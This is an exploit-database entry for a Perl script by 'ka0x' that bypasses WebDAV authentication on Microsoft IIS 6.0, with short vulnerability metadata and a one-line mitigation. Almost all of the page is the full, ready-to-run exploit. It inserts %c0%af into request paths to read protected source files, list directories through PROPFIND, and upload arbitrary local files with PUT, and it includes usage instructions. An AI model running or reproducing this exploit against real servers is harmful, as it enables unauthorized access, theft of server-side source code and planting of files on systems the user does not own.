Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit

vendor:

Microsoft IIS

by:

ka0x

7.5

CVSS

HIGH

Remote Authentication Bypass

Unknown

CWE

Product Name: Microsoft IIS

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE: a:microsoft:iis:6.0

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit

This exploit allows an attacker to bypass authentication in Microsoft IIS 6.0 WebDAV. It can be used to retrieve source code or upload files to the server. The exploit takes advantage of a vulnerability in the handling of certain HTTP requests.

Mitigation:

Apply the latest security patches for Microsoft IIS 6.0. Disable WebDAV if it is not needed.

Source

Exploit-DB raw data:

#!/usr/bin/perl -W
#
# Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
# written by ka0x <ka0x01[alt+64]gmail.com>
# Advisory: http://www.milw0rm.com/exploits/8765
#
# Greets: an0de, Piker, xarnuz, NullWave07, Pepelux, k0rde, JoSs, Trancek and others!

use IO::Socket ;

my ( $host, $path ) = @ARGV ;
my $port = 80 ; # webserver port

&usage unless $ARGV[1] ;

$host =~ s/http:\/\/// if($host =~ /^http:\/\//i) ;
$path =~ s/\/// if(substr($path, 0,1) eq '/');

sub _file {
	$file = shift ;
	open(FILE, $file) || die "[-] ERROR: ".$!,"\n" ;
	while( <FILE> ){
		$cont .= $_ ;
	}
	close(FILE) ;
	return $cont ;
}


print "write 'help' for get help list\n";


while( 1 ) {

	my $sock = IO::Socket::INET->new (PeerAddr => $host, 
					PeerPort => $port,
					Proto    => 'tcp') || die "\n[-] ERROR: ".$!,"\n" ;
	print "\$> ";
	chomp( my $option = <STDIN> ) ;
	last if $option eq 'quit' ;

	if($option eq 'source') {
		$path =~ s/\//%c0%af\// ; 
		print $sock "GET /".$path." HTTP/1.1\r\n" ; 
		print $sock "Translate: f\r\n" ;
		print $sock "Host: ".$host."\r\n" ;
		print $sock "Connection: close\r\n\r\n" ;

		while(<$sock>){
			print $_ ;
		}
		close($sock) ;
	}


	elsif($option eq 'path') {
		$path =~ s/\//%c0%af\// ;
		print $sock "PROPFIND  /".$path." HTTP/1.1\r\n" ;
		print $sock "Host: ".$host."\r\n" ;
		print $sock "Connection:close\r\n" ;
		print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
		print $sock "Content-Length: 0\r\n\r\n" ;
		print $sock  '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>' ;

		while(<$sock>){
			print $_ ;
		}
		close($sock) ;
	}


	elsif($option eq 'put') {
		$path =~ s/\//%c0%af\// ;
		print "[*] Insert a local file (ex: /root/file.txt): " ;
		chomp( $local = <STDIN> ) ;
		$file_l = _file( $local ) ;
		print $sock "PUT /".$path."my_file.txt HTTP/1.1\r\n" ;
		print $sock "Host: ".$host."\r\n" ;
		print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
		print $sock "Connection:close\r\n" ;
		print $sock "Content-Length: ".length($file_l)."\r\n\r\n" ;
		print $sock $file_l,"\r\n" ;

		while(<$sock>){
			print $_ ;
		}
		close($sock) ;
	}

	elsif($option eq 'help') {
		print "\n\t\t- OPTIONS -\n\n\n" ;
		print "\thelp\t\tgive this help list\n" ;
		print "\tsource\t\tget file content\n" ;
		print "\tpath\t\tget directory contents\n" ;
		print "\tput\t\tput file\n" ;
		print "\tquit\t\texit exploit\n\n" ;
	}
	
}

sub usage {
	print << 'EOH' ;

  $ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
  $ written by ka0x <ka0x01[at]gmail.com>
  $ 25/05/2009

usage:
   perl $0 <host> <path>

example:
   perl $0 localhost dir/
   perl $0 localhost dir/file.txt

EOH

	exit;
}
	
	


__END__

# milw0rm.com [2009-05-26]